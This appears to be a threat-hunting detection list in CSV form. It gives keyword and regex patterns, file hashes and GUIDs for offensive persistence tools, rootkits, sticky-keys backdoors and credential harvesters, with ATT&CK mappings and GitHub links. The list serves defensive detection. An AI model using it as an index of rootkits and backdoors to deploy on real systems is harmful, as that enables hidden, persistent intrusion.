"*3gstudent/COM-Object-hijacking*",".{0,1000}3gstudent\/COM\-Object\-hijacking.{0,1000}","offensive_tool_keyword","COM-Object-hijacking","use COM Object hijacking to maintain persistence.(Hijack CAccPropServicesClass and MMDeviceEnumerator)","T1546.015","TA0003","N/A","N/A","Persistence","https://github.com/3gstudent/COM-Object-hijacking","1","1","N/A","N/A","8","1","57","30","2017-08-04T09:19:40Z","2017-08-04T08:15:36Z"
"*3gstudent/Office-Persistence*",".{0,1000}3gstudent\/Office\-Persistence.{0,1000}","offensive_tool_keyword","Office-Persistence","Use powershell to test Office-based persistence methods","T1059.001 - T1137 - T1116","TA0003 ","N/A","N/A","Persistence","https://github.com/3gstudent/Office-Persistence","1","1","N/A","N/A","9","1","76","24","2021-04-17T01:39:13Z","2017-07-14T10:03:35Z"
"*3gstudent/Waitfor-Persistence*",".{0,1000}3gstudent\/Waitfor\-Persistence.{0,1000}","offensive_tool_keyword","Waitfor-Persistence","Use Waitfor.exe to maintain persistence","T1059 - T1117 - T1053.005 - T1546.013","TA0002 - TA0003","N/A","N/A","Persistence","https://github.com/3gstudent/Waitfor-Persistence","1","1","N/A","N/A","9","1","54","19","2021-04-17T01:41:42Z","2017-06-07T09:33:13Z"
"*42e2d4b8d628e3df77baf23238076afb7003f1d31fb08032324f249d80df8302*",".{0,1000}42e2d4b8d628e3df77baf23238076afb7003f1d31fb08032324f249d80df8302.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4044","555","2024-11-15T15:25:44Z","2020-11-05T09:18:51Z"
"*42e504f3d9d9800c1c75ff6d8c5433d801e7148760cba709fa3bd5dd8e4a0208*",".{0,1000}42e504f3d9d9800c1c75ff6d8c5433d801e7148760cba709fa3bd5dd8e4a0208.{0,1000}","offensive_tool_keyword","ruler","A tool to abuse Exchange services","T1087 - T1110 - T1133 - T1064 - T1204","TA0007 - TA0006 - TA0003 - TA0002 - TA0005","N/A","APT33","Persistence","https://github.com/sensepost/ruler","1","0","#filehash","N/A","10","10","2190","361","2024-06-10T11:03:07Z","2016-08-18T15:05:13Z"
"*436b7f540f534a0ec1337cf82a76cb7727acda423132195f0c81560cdf75c438*",".{0,1000}436b7f540f534a0ec1337cf82a76cb7727acda423132195f0c81560cdf75c438.{0,1000}","offensive_tool_keyword","Pspersist","Dropping a powershell script at %HOMEPATH%\Documents\windowspowershell\ that contains the implant's path and whenever powershell process is created the implant will executed too.","T1546 - T1546.013 - T1053 - T1053.005 - T1037 - T1037.001","TA0003","N/A","N/A","Persistence","https://github.com/TheD1rkMtr/Pspersist","1","0","#filehash","N/A","10","1","85","24","2023-08-02T02:27:29Z","2023-02-01T17:21:38Z"
"*44370c394c70f88cd9ecfb23f9d6570e2134761d1a04deea5205cec31469cfb0*",".{0,1000}44370c394c70f88cd9ecfb23f9d6570e2134761d1a04deea5205cec31469cfb0.{0,1000}","offensive_tool_keyword","Termite","Termite rootit abused by threat actors","T1014 - T1069 - T1055","TA0005 - TA0003 - TA0004","Operation TunnelSnake","Whitefly","Persistence","https://github.com/rootkiter/Binary-files/tree/212c43b40e2e4c2e2703400caaa732557b6080a4","1","0","#filehash","N/A","10","10","156","177","2021-01-26T23:16:49Z","2019-01-03T05:01:20Z"
"*443D8CBF-899C-4C22-B4F6-B7AC202D4E37*",".{0,1000}443D8CBF\-899C\-4C22\-B4F6\-B7AC202D4E37.{0,1000}","offensive_tool_keyword","SharpHide","Tool to create hidden registry keys","T1112 - T1562 - T1562.001","TA0005 - TA0003","N/A","N/A","Persistence","https://github.com/outflanknl/SharpHide","1","0","#GUIDproject","N/A","9","5","474","95","2019-10-23T10:44:22Z","2019-10-20T14:25:47Z"
"*46af7c0674c69df2af1905ea58288f24d2d10e644d5446d8d2b71b251e8e70bd*",".{0,1000}46af7c0674c69df2af1905ea58288f24d2d10e644d5446d8d2b71b251e8e70bd.{0,1000}","offensive_tool_keyword","Termite","Termite rootit abused by threat actors","T1014 - T1069 - T1055","TA0005 - TA0003 - TA0004","Operation TunnelSnake","Whitefly","Persistence","https://github.com/rootkiter/Binary-files/tree/212c43b40e2e4c2e2703400caaa732557b6080a4","1","0","#filehash","N/A","10","10","156","177","2021-01-26T23:16:49Z","2019-01-03T05:01:20Z"
"*486d59732d2c346aa2cbaffff0d290b0e5fc0a967e0878240fd29df65525dfc8*",".{0,1000}486d59732d2c346aa2cbaffff0d290b0e5fc0a967e0878240fd29df65525dfc8.{0,1000}","offensive_tool_keyword","Offensive-Netsh-Helper","Maintain Windows Persistence with an evil Netshell Helper DLL","T1174 - T1055.011 - T1546.013 - T1574.002 - T1105","TA0003 ","N/A","N/A","Persistence","https://github.com/rtcrowley/Offensive-Netsh-Helper","1","0","#filehash","N/A","9","1","12","5","2018-07-28T02:12:09Z","2018-07-25T22:49:20Z"
"*48bf95a01c16f6af2c577d1e1df7e53225edbbfc2014b2ecec5f939e31a6c576*",".{0,1000}48bf95a01c16f6af2c577d1e1df7e53225edbbfc2014b2ecec5f939e31a6c576.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4044","555","2024-11-15T15:25:44Z","2020-11-05T09:18:51Z"
"*4a1e4478704d8ad1fbec9b3258f315028fedd0dfbf739508ab1438d42625cbef*",".{0,1000}4a1e4478704d8ad1fbec9b3258f315028fedd0dfbf739508ab1438d42625cbef.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4044","555","2024-11-15T15:25:44Z","2020-11-05T09:18:51Z"
"*4bd863af3ba70c958caf5b048ddd90a32a54bb9ae5d3e7578e8e0f1330a7d68f*",".{0,1000}4bd863af3ba70c958caf5b048ddd90a32a54bb9ae5d3e7578e8e0f1330a7d68f.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4044","555","2024-11-15T15:25:44Z","2020-11-05T09:18:51Z"
"*4bf92f0d8d8e73629d1e2b9f03375dbad214021e5a117e0557391526297c5314*",".{0,1000}4bf92f0d8d8e73629d1e2b9f03375dbad214021e5a117e0557391526297c5314.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4044","555","2024-11-15T15:25:44Z","2020-11-05T09:18:51Z"
"*4c0fdf591ecec6aaeb3b6529f7b3800125910f16bc23496ba279a4bee0c2361c*",".{0,1000}4c0fdf591ecec6aaeb3b6529f7b3800125910f16bc23496ba279a4bee0c2361c.{0,1000}","offensive_tool_keyword","SharpSC",".NET assembly to interact with services. (included in powershell empire)","T1543.003","TA0003","N/A","N/A","Persistence","https://github.com/djhohnstein/SharpSC","1","0","#filehash","N/A","8","1","38","6","2019-09-27T23:04:24Z","2019-09-24T21:05:38Z"
"*4c4b0e00d9620697ba7ef9ff00fd58022b9e39db23dc65348fce5d3a321000e6*",".{0,1000}4c4b0e00d9620697ba7ef9ff00fd58022b9e39db23dc65348fce5d3a321000e6.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4044","555","2024-11-15T15:25:44Z","2020-11-05T09:18:51Z"
"*4c7260ac051907d12896054145fe103f9ea06de3bb2f04f0aab953dff32028de*",".{0,1000}4c7260ac051907d12896054145fe103f9ea06de3bb2f04f0aab953dff32028de.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4044","555","2024-11-15T15:25:44Z","2020-11-05T09:18:51Z"
"*4D71336E-6EF6-4DF1-8457-B94DC3D73FE7*",".{0,1000}4D71336E\-6EF6\-4DF1\-8457\-B94DC3D73FE7.{0,1000}","offensive_tool_keyword","r77-rootkit","Fileless ring 3 rootkit with installer and persistence that hides processes, files, network connections","T1014 - T1055 - T1055.013 - T1060 - T1106 - T1070.009","TA0005 - TA0003","N/A","N/A","Persistence","https://github.com/bytecode77/r77-rootkit","1","0","#GUIDproject","N/A","10","10","1715","403","2025-01-24T14:42:29Z","2017-12-17T13:04:14Z"
"*4dd16113033905dbff69b134008cb848367c4d6899c6d5f9b63164328e576d79*",".{0,1000}4dd16113033905dbff69b134008cb848367c4d6899c6d5f9b63164328e576d79.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4044","555","2024-11-15T15:25:44Z","2020-11-05T09:18:51Z"
"*4ed0631fabe9b3b097f314d1cddb565f082533bf589e8366ec01d149c931d6f6*",".{0,1000}4ed0631fabe9b3b097f314d1cddb565f082533bf589e8366ec01d149c931d6f6.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4044","555","2024-11-15T15:25:44Z","2020-11-05T09:18:51Z"
"*4f188f89c92bb150c8b0b623d2041373b946a8920e97e464964ed79def029605*",".{0,1000}4f188f89c92bb150c8b0b623d2041373b946a8920e97e464964ed79def029605.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4044","555","2024-11-15T15:25:44Z","2020-11-05T09:18:51Z"
"*4f52fb4cf7dd744b01695e5356442182bc9fdb635da8f766537c12e0d83ad18f*",".{0,1000}4f52fb4cf7dd744b01695e5356442182bc9fdb635da8f766537c12e0d83ad18f.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4044","555","2024-11-15T15:25:44Z","2020-11-05T09:18:51Z"
"*504764d19a025b282b230491d91abbc551f1b9887ee669bbb7211b6dd86b1038*",".{0,1000}504764d19a025b282b230491d91abbc551f1b9887ee669bbb7211b6dd86b1038.{0,1000}","greyware_tool_keyword","dropbear","A smallish SSH server and client","T1021.004 - T1570","TA0003","N/A","COZY BEAR","Persistence","https://github.com/mkj/dropbear","1","0","#filehash","N/A","8","10","1790","406","2025-01-19T04:49:33Z","2013-03-19T11:15:36Z"
"*51093bb7f3a947ed390aa2a560dbe91621379ef2125582249a5769aa5a58b379*",".{0,1000}51093bb7f3a947ed390aa2a560dbe91621379ef2125582249a5769aa5a58b379.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4044","555","2024-11-15T15:25:44Z","2020-11-05T09:18:51Z"
"*54e82ce2900876594c573f74437a23034f70f959e428bb2cf046afe73f6abc56*",".{0,1000}54e82ce2900876594c573f74437a23034f70f959e428bb2cf046afe73f6abc56.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4044","555","2024-11-15T15:25:44Z","2020-11-05T09:18:51Z"
"*56ab5129d379ec39c8037a5937b4ce5cf6680377786548df125b93473e67623a*",".{0,1000}56ab5129d379ec39c8037a5937b4ce5cf6680377786548df125b93473e67623a.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4044","555","2024-11-15T15:25:44Z","2020-11-05T09:18:51Z"
"*56f4763af00801c5eb80c39f141a563069669def9f98c1798c0f4b4094f34821*",".{0,1000}56f4763af00801c5eb80c39f141a563069669def9f98c1798c0f4b4094f34821.{0,1000}","offensive_tool_keyword","WinPirate","automated sticky keys backdoor + credentials harvesting","T1547.001 - T1546.008 - T1555.003 - T1059 - T1573 - T1070.004 - T1003","TA0003 - TA0005 - TA0006","N/A","N/A","Persistence","https://github.com/l3m0n/WinPirate","1","0","#filehash","N/A","9","1","13","32","2016-07-17T20:02:07Z","2016-07-18T03:40:13Z"
"*575b267a045e31d3616cfdcc275c8bb6617136b1446253ee2954104b199276ff*",".{0,1000}575b267a045e31d3616cfdcc275c8bb6617136b1446253ee2954104b199276ff.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4044","555","2024-11-15T15:25:44Z","2020-11-05T09:18:51Z"
"*5776b8a6c27e3375134e81fe72a0eebf781029ff5e05683fdc58459741a7c437*",".{0,1000}5776b8a6c27e3375134e81fe72a0eebf781029ff5e05683fdc58459741a7c437.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4044","555","2024-11-15T15:25:44Z","2020-11-05T09:18:51Z"
"*578a42cf90cf1bcc569f925d7909bbedd2756367906d2875a23cbc8bb1628577*",".{0,1000}578a42cf90cf1bcc569f925d7909bbedd2756367906d2875a23cbc8bb1628577.{0,1000}","offensive_tool_keyword","Xrulez","XRulez is a Windows executable that can add malicious rules to Outlook from the command line of a compromised host.","T1078 - T1105 - T1059 - T1566","TA0002 -  TA0003 - TA0005 - TA0011","N/A","N/A","Persistence","https://github.com/FSecureLABS/Xrulez","1","0","#filehash","N/A","10","2","160","46","2018-12-11T16:33:08Z","2016-08-31T10:10:10Z"
"*580ba177-cf9a-458c-a692-36dd6f23ea77*",".{0,1000}580ba177\-cf9a\-458c\-a692\-36dd6f23ea77.{0,1000}","offensive_tool_keyword","CreateService","Creating a persistent service","T1543.003 - T1547.001 - T1050","TA0003","N/A","N/A","Persistence","https://github.com/uknowsec/CreateService","1","0","#GUIDproject","N/A","4","2","104","27","2021-04-26T06:43:12Z","2020-09-23T05:03:52Z"
"*58482e19d6376bbe0120289b6d39a35de15b68d00713f821ab0c7f28f85a31ee*",".{0,1000}58482e19d6376bbe0120289b6d39a35de15b68d00713f821ab0c7f28f85a31ee.{0,1000}","offensive_tool_keyword","Pspersist","Dropping a powershell script at %HOMEPATH%\Documents\windowspowershell\ that contains the implant's path and whenever powershell process is created the implant will executed too.","T1546 - T1546.013 - T1053 - T1053.005 - T1037 - T1037.001","TA0003","N/A","N/A","Persistence","https://github.com/TheD1rkMtr/Pspersist","1","0","#filehash","N/A","10","1","85","24","2023-08-02T02:27:29Z","2023-02-01T17:21:38Z"
"*5866ad6e1eb1d3c5481179c4eae84fc733fca93782827f08b8e980dd455f8e1d*",".{0,1000}5866ad6e1eb1d3c5481179c4eae84fc733fca93782827f08b8e980dd455f8e1d.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4044","555","2024-11-15T15:25:44Z","2020-11-05T09:18:51Z"
"*588f790b5ea620a3077e6231bef7180951410f445c5d5b9aac8289b3a8d3cf1a*",".{0,1000}588f790b5ea620a3077e6231bef7180951410f445c5d5b9aac8289b3a8d3cf1a.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4044","555","2024-11-15T15:25:44Z","2020-11-05T09:18:51Z"
"*58B32FCA-F385-4500-9A8E-7CBA1FC9BA13*",".{0,1000}58B32FCA\-F385\-4500\-9A8E\-7CBA1FC9BA13.{0,1000}","offensive_tool_keyword","AMSI-Provider","A fake AMSI Provider which can be used for persistence","T1546.013 - T1574.012","TA0005 - TA0003","N/A","N/A","Persistence","https://github.com/netbiosX/AMSI-Provider","1","0","#GUIDproject","N/A","10","2","141","15","2021-05-16T16:56:15Z","2021-05-15T16:18:47Z"
"*58d9516f4e361b773e8638c802e7d0bcc716d1c750d7306764062394fc129983*",".{0,1000}58d9516f4e361b773e8638c802e7d0bcc716d1c750d7306764062394fc129983.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4044","555","2024-11-15T15:25:44Z","2020-11-05T09:18:51Z"
"*58ec2f3cc5cbbcf8add01a0f5f7c8331d830b7944a1031788a5afe4a70ec0a3d*",".{0,1000}58ec2f3cc5cbbcf8add01a0f5f7c8331d830b7944a1031788a5afe4a70ec0a3d.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4044","555","2024-11-15T15:25:44Z","2020-11-05T09:18:51Z"
"*58fcbf640b58a45f2fed22fdd70c5d73ae781274927a2def5f71cb3e4ce02a15*",".{0,1000}58fcbf640b58a45f2fed22fdd70c5d73ae781274927a2def5f71cb3e4ce02a15.{0,1000}","offensive_tool_keyword","Termite","Termite rootit abused by threat actors","T1014 - T1069 - T1055","TA0005 - TA0003 - TA0004","Operation TunnelSnake","Whitefly","Persistence","https://github.com/rootkiter/Binary-files/tree/212c43b40e2e4c2e2703400caaa732557b6080a4","1","0","#filehash","N/A","10","10","156","177","2021-01-26T23:16:49Z","2019-01-03T05:01:20Z"
"*58fcbf640b58a45f2fed22fdd70c5d73ae781274927a2def5f71cb3e4ce02a15*",".{0,1000}58fcbf640b58a45f2fed22fdd70c5d73ae781274927a2def5f71cb3e4ce02a15.{0,1000}","offensive_tool_keyword","Termite","Termite rootit abused by threat actors","T1014 - T1069 - T1055","TA0005 - TA0003 - TA0004","Operation TunnelSnake","Whitefly","Persistence","https://github.com/rootkiter/Binary-files/tree/212c43b40e2e4c2e2703400caaa732557b6080a4","1","0","#filehash","N/A","10","10","156","177","2021-01-26T23:16:49Z","2019-01-03T05:01:20Z"
"*594811dafdfb9f5cc56b604d8fe97777c23057e37803ec34afdf5680bf9276ea*",".{0,1000}594811dafdfb9f5cc56b604d8fe97777c23057e37803ec34afdf5680bf9276ea.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4044","555","2024-11-15T15:25:44Z","2020-11-05T09:18:51Z"
"*59a64374f430585117c385edce4ac8ff536cb2710a0037384f9f869601752af1*",".{0,1000}59a64374f430585117c385edce4ac8ff536cb2710a0037384f9f869601752af1.{0,1000}","offensive_tool_keyword","logon_backdoor","automated sticky keys backdoor","T1174 - T1078 - T1546.013","TA0003","N/A","N/A","Persistence","https://github.com/szymon1118/logon_backdoor","1","0","#filehash","N/A","6","1","10","4","2016-02-12T11:42:59Z","2016-02-10T22:38:46Z"
"*5A403F3C-9136-4B67-A94E-02D3BCD3162D*",".{0,1000}5A403F3C\-9136\-4B67\-A94E\-02D3BCD3162D.{0,1000}","offensive_tool_keyword","Pspersist","Dropping a powershell script at %HOMEPATH%\Documents\windowspowershell\ that contains the implant's path and whenever powershell process is created the implant will executed too.","T1546 - T1546.013 - T1053 - T1053.005 - T1037 - T1037.001","TA0003","N/A","N/A","Persistence","https://github.com/TheD1rkMtr/Pspersist","1","0","#GUIDproject","N/A","10","1","85","24","2023-08-02T02:27:29Z","2023-02-01T17:21:38Z"
"*5a958c89-6327-401c-a214-c89e54855b57*",".{0,1000}5a958c89\-6327\-401c\-a214\-c89e54855b57.{0,1000}","offensive_tool_keyword","Sunder","Windows rootkit designed to work with BYOVD exploits","T1543.003 - T1562.001 - T1547.001 - T1068 - T1548.002","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/ColeHouston/Sunder","1","0","#GUIDproject","N/A","10","2","145","15","2025-01-18T10:41:50Z","2025-01-10T03:57:05Z"
"*5b313e80767783165c9f99079a6210582b5f57fe4c3f34ab2c5d27e6b1a09695*",".{0,1000}5b313e80767783165c9f99079a6210582b5f57fe4c3f34ab2c5d27e6b1a09695.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4044","555","2024-11-15T15:25:44Z","2020-11-05T09:18:51Z"
"*5bcac0a74645424d26b217b7725be826b7d558ecbce7ec5d3072d802e1834181*",".{0,1000}5bcac0a74645424d26b217b7725be826b7d558ecbce7ec5d3072d802e1834181.{0,1000}","offensive_tool_keyword","Termite","Termite rootit abused by threat actors","T1014 - T1069 - T1055","TA0005 - TA0003 - TA0004","Operation TunnelSnake","Whitefly","Persistence","https://github.com/rootkiter/Binary-files/tree/212c43b40e2e4c2e2703400caaa732557b6080a4","1","0","#filehash","N/A","10","10","156","177","2021-01-26T23:16:49Z","2019-01-03T05:01:20Z"
"*5d4d311ed2ab95bbd9698cbd26c83ce62ee9a665c462ef9f6fcee2406ab795c4*",".{0,1000}5d4d311ed2ab95bbd9698cbd26c83ce62ee9a665c462ef9f6fcee2406ab795c4.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4044","555","2024-11-15T15:25:44Z","2020-11-05T09:18:51Z"
"*5d637915abc98b21f94b0648c552899af67321ab06fb34e33339ae38401734cf*",".{0,1000}5d637915abc98b21f94b0648c552899af67321ab06fb34e33339ae38401734cf.{0,1000}","offensive_tool_keyword","Diamorphine","LKM rootkit for Linux Kernels","T1547.006 - T1548.002 - T1562.001 - T1027","TA0003 - TA0004 - TA0005 - TA0006 - TA0007","N/A","N/A","Persistence","https://github.com/m0nad/Diamorphine","1","0","#filehash #linux","N/A","10","10","1911","439","2023-09-20T10:56:06Z","2013-11-06T22:38:47Z"
"*5f4e2217fe4e88c926dbe4d002e5bfaa47591a6e53b93df88596a654aaeae78d*",".{0,1000}5f4e2217fe4e88c926dbe4d002e5bfaa47591a6e53b93df88596a654aaeae78d.{0,1000}","greyware_tool_keyword","dropbear","A smallish SSH server and client","T1021.004 - T1570","TA0003","N/A","COZY BEAR","Persistence","https://github.com/mkj/dropbear","1","0","#filehash","N/A","8","10","1790","406","2025-01-19T04:49:33Z","2013-03-19T11:15:36Z"
"*5f62f9a20546e50fcb59aedca67b9fd9252c1c026ef81649bd9eb7366c4376aa*",".{0,1000}5f62f9a20546e50fcb59aedca67b9fd9252c1c026ef81649bd9eb7366c4376aa.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4044","555","2024-11-15T15:25:44Z","2020-11-05T09:18:51Z"
"*5ffd93d97e56861c46c562585d50dc820200763e633052b6a6d1e53566822cf8*",".{0,1000}5ffd93d97e56861c46c562585d50dc820200763e633052b6a6d1e53566822cf8.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4044","555","2024-11-15T15:25:44Z","2020-11-05T09:18:51Z"
"*6112fed1a30fcd45861afdbd13a6888f5cbeb6c3711d8262d6248eb4941aa2da*",".{0,1000}6112fed1a30fcd45861afdbd13a6888f5cbeb6c3711d8262d6248eb4941aa2da.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4044","555","2024-11-15T15:25:44Z","2020-11-05T09:18:51Z"
"*635640f232a519c71fbdd148bfef9ef8f9c61909106f2d458273fa07830b21ea*",".{0,1000}635640f232a519c71fbdd148bfef9ef8f9c61909106f2d458273fa07830b21ea.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4044","555","2024-11-15T15:25:44Z","2020-11-05T09:18:51Z"
"*63688c4f211155c76f2948ba21ebaf83*",".{0,1000}63688c4f211155c76f2948ba21ebaf83.{0,1000}","offensive_tool_keyword","ABPTTS","TCP tunneling over HTTP/HTTPS for web application servers","T1071.001 - T1573","TA0003 - TA0011","N/A","N/A","Persistence","https://github.com/nccgroup/ABPTTS","1","0","N/A","N/A","9","8","731","151","2016-08-12T19:36:24Z","2016-07-29T21:45:57Z"
"*63a6bad64de560056ed496b6b7103056e4bdaf19f49011120997a5b87d141940*",".{0,1000}63a6bad64de560056ed496b6b7103056e4bdaf19f49011120997a5b87d141940.{0,1000}","offensive_tool_keyword","Office-Persistence","Use powershell to test Office-based persistence methods","T1059.001 - T1137 - T1116","TA0003 ","N/A","N/A","Persistence","https://github.com/3gstudent/Office-Persistence","1","0","#filehash","N/A","9","1","76","24","2021-04-17T01:39:13Z","2017-07-14T10:03:35Z"
"*643ad690-5c85-4b12-af42-2d31d11657a1*",".{0,1000}643ad690\-5c85\-4b12\-af42\-2d31d11657a1.{0,1000}","offensive_tool_keyword","Sunder","Windows rootkit designed to work with BYOVD exploits","T1543.003 - T1562.001 - T1547.001 - T1068 - T1548.002","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/ColeHouston/Sunder","1","0","#GUIDproject","N/A","10","2","145","15","2025-01-18T10:41:50Z","2025-01-10T03:57:05Z"
"*64b40a70b232b7e23a187a11c52ef8d8b7f3e16a5b869af16b390cbbe4aab935*",".{0,1000}64b40a70b232b7e23a187a11c52ef8d8b7f3e16a5b869af16b390cbbe4aab935.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4044","555","2024-11-15T15:25:44Z","2020-11-05T09:18:51Z"
